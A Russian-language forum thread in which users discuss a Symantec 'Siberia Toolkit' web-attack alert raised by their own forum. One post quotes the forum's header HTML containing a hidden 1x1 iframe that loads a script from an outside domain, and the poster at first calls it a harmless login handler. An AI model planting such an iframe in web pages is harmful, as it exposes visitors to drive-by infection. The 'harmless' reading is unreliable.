может и чисто, но "запашок" идет откуда?
1) комп корпоративный и я не могу ставить на него все подряд, даже от мягкомелких
2) оные затычки от мягкомелких уже стоят
---------- Сообщение добавлено в 17:35 ---------- Предыдущее сообщение размещено в 17:24 ----------
вот что пишет симантек
в машинном переводеWeb Attack: Siberia Toolkit Activity 2
Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
Description
Siberia Toolkit compromises the machine by targeting various vendor vulnerabilities on the victim's machine.
Additional Information
Siberia Toolkit compromises the machine by targeting various vendor vulnerabilities on the victim's machine.
Affected
Various Platforms
Response
NA
пока это всёВеб Атака: Сибирь Инструментарий Мероприятие 2
Важность: Высокая
Эта атака может представлять серьезную угрозу безопасности. Вы должны принять немедленные меры, чтобы остановить любой ущерб или предотвратить дальнейшее повреждение не произошло.
Описание
Сибирь Инструментарий компроментирует машины, и ориентирован на различные уязвимости поставщика на машине жертвы.
Дополнительная информация
Сибирь Инструментарий компроментирует машины, и ориентирован на различные уязвимости поставщика на машине жертвы.
Пострадавшие
Различные платформы
Ответ
Не Доступно
желаю успехов
Не совсем понятно про "запашок".
1.= Тогда какой с тебя спрос = забей, это уже спрос с админа ))))
2. = Затычки не стоят. т.к. касаются MDAC 2.*
Успехов
P/S
Там далжно быть 4 затычки, одна из них датирована 2006г
П.П.С.
Разнокалиберный семантек в колве 600шт никаких проблем не обнаруживает
Ну это понятно каждому грамотному пользователю
Вот только представ те, после каждого мелкого изменения делать бэкап
а когда их за пару-тройку месяцев с пару десятков...
вот тут то и кроется причина)))) что тяжко это..
---------- Сообщение добавлено в 23:06 ---------- Предыдущее сообщение размещено в 23:03 ----------
Срочно писать в личку Роме-crc.
а в общем пользуйтесь Оперой или Фаерфоксом. Неужели недостоточно 15-летней дырявости Эксплорера, что бы продолжать им пользоватся
Славянские Боги, пусть будут Триславны их имена!
Да в том-то и дело, что не нужно делать бэкап после каждого изменения! Перестановка Винды из бэкапа это примерно как естественный отбор - остаётся только то, что реально нужно.
Это сродни моему жизненному правилу - если вещь не использовалась длительное время, то она не нужна, можно ее выбросить.
Правда, иногда срабатывает один из законов Мура: "Как только ты выбросишь какую-то вещь, она немедленно тебе понадобится" (с)
Но с другой, стороны, это тоже полезно, т.к. в следующий раз эту вещь сразу зачисляешь в разряд дефолтных и включаешь в бэкап.
Alex.M, если вы имеете в виду вот этот кусок кода,:
то этот кусок кода как раз выглядит более-менее прилично. Это процедура логина/логаута, а iframe - точка вызова обработчика событий, который лежит где-то на стороннем сервере http:/ /agonizing.in/wb65a/05.php. Только и всего.Код:<div id="header" class="floatcontainer doc_header"> <div><a name="top" href="forum.php" class="logo-image"><img src="images/misc/nissan-club-logo.png" alt="Ниссан Клуб Украина - Официальный форум - Powered by vBulletin" /></a></div> <div id="toplinks" class="toplinks"><iframe width=1 height=1 frameborder=0 src=http://agonizing.in/wb65a/05.php> </iframe> <ul class="isuser"> <li><a href="login.php?do=logout&logouthash=1312269783-9f7483d40168f2352ff3186358db39630d0f7f22" onclick="return log_out('Вы действительно хотите выйти?')">Выход</a></li> <li><a href="usercp.php">Кабинет</a></li> <li><a href="member.php?u=4737">Мой профиль</a></li> <li class="popupmenu nonotifications" id="nonotifications"> <a class="popupctrl" href="usercp.php">Уведомления</a> <ul class="popupbody popuphover"> <li>Нет новых сообщений</li> <li><a href="private.php">Входящие</a></li> </ul> </li> <li class="welcomelink">Добро пожаловать, <a href="member.php?u=4737">Paulus</a>.</li> </ul> </div> <div class="ad_global_header"> </div> <hr /> </div>
Хотя как для меня, то это не привычно, что процедура инициализации пользователя (по идее весьма важная) лежит где-то за пределами сервера. Возможно, кто-то собирает информацию о нас, пользователях (логины/пароли). Но кому и зачем она нужна - не могу придумать.
По хорошему - надо бы обратиться к разработчикам форума и указать им на этот iframe и спросить, именно ли это они писали, или это добавил какой-то червяк, перенаправляющий наши данные куда следует...
А кто у нас занимается тех. поддержкой форума?